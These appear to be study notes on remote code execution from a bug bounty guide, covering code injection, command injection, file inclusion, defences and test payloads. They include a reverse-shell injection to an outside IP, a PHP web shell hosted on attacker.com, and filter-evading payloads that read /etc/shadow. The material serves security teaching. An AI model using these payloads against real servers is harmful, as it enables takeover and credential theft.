Source: Bug Bounty Bootcamp by Vickie Li

RCE lets an attacker execute arbitrary OS commands on the target server. It can be achieved via SQL injection, insecure deserialization, template injection, and two additional vectors covered here: code injection and file inclusion.

Occurs when user input is passed into an evaluated code function without sanitization.

Python eval() example: <code python> def calculate(input):

  return eval("{}".format(input))

```

Normal use: GET /calculator?calc=1+2 returns 3.

Malicious use: <code> GET /calculator?calc=“import('os').system('ls')” ```

Command injection (user input concatenated into shell command): <code python> os.system(“wget -O- {}”.format(url)) ```

Inject via semicolon: <code> GET /download?url=“google.com;bash -i >& /dev/tcp/10.0.0.1/8080 0>&1” ```

Remote File Inclusion (RFI): app includes a file from a user-supplied URL: <code php> $file = $_GET[“page”]; include $file; ```

Host malicious.php on your server: <code php> <?PHP system($_GET[“cmd”]); ?> ```

Trigger: <code> http://example.com/?page=http://attacker.com/malicious.php?cmd=id ```

Local File Inclusion (LFI): app prepends a directory and includes the result. Upload a shell to the server's uploads directory, then use path traversal: <code> http://example.com/?page=../uploads/USERNAME/malicious.php ```

• Avoid inserting user input into eval(), exec(), include(), system(), or similar
• Use language APIs for OS operations instead of shell commands (e.g., PHP mkdir() vs system(“mkdir …”))
• Allowlist inputs to dangerous functions
• Restrict file uploads to safe file types; host uploads in a separate environment from source code
• Apply principle of least privilege to the web server process
• Keep dependencies patched
• Deploy a WAF

Identify the web server, programming language, and frameworks (see Ch5 recon techniques). RCE exploits are highly language-specific.

• URL parameters passed into eval/exec/system
• File-upload features where uploaded content might be executed
• Input that determines a file path or filename to include

Python: <code> print(“RCE test!”) “import('os').system('ls')” “import('os').system('sleep 10')” ```

PHP: <code> phpinfo(); <?php system(“ls”);?> <?php system(“sleep 10”);?> ```

Unix command injection: <code> ;ls;

& sleep 10; ` sleep 10;` $(sleep 10) ```

File inclusion: <code> http://example.com/?page=http://attacker.com/malicious.php http://example.com/?page=../uploads/malicious.php http://example.com/?page=..%2fuploads%2fmalicious.php ```

Classic RCE: execute whoami and check for www-data or similar in the response. Blind RCE: execute sleep 5 and measure the 5-second delay.

In a bug bounty context, do not attempt full privilege escalation – read the program rules. Safe PoC options:

• Execute whoami or ls
• Read /etc/passwd (world-readable; proves file access)
• Create a file: touch rce_by_YOUR_NAME.txt
• For blind RCE: use sleep 5 as PoC

Avoid reading sensitive customer data or modifying critical files.

Unix payloads with quotes, wildcards, and empty substitutions (all read /etc/shadow): <code> cat /etc/shadow cat “/e”tc'/shadow' cat /etc/sh*dow cat /etc/sha``dow cat /etc/sha$()dow cat /etc/sha${}dow ```

PHP string concatenation and comments: <code php> ('sys'.'tem')('cat /etc/shadow'); system/**/('ls'); '\x73\x79\x73\x74\x65\x6d'('ls'); ```

Python equivalents: <code> import('os').system('cat /etc/shadow') import('o'+'s').system('cat /etc/shadow') import('\x6f\x73').system('cat /etc/shadow') ```

Split payload across duplicate parameters (server concatenates them): <code> GET /calculator?calc=“import('os').sy”&calc=“stem('ls')” ```

Additional bypass techniques: URL encoding, double URL encoding, null bytes, newlines, non-ASCII characters.

1. Recon: identify server language, frameworks, and technologies.
2. Find suspicious input locations: eval parameters, file inclusion paths, shell command wrappers, file uploads.
3. Submit test payloads targeting the identified language.
4. If blocked, try filter bypass techniques (quotes, wildcards, encoding, parameter splitting).
5. Confirm with harmless commands (whoami, ls, sleep 5) or file creation.
6. Draft report with working PoC; avoid reading sensitive data or modifying files beyond the PoC.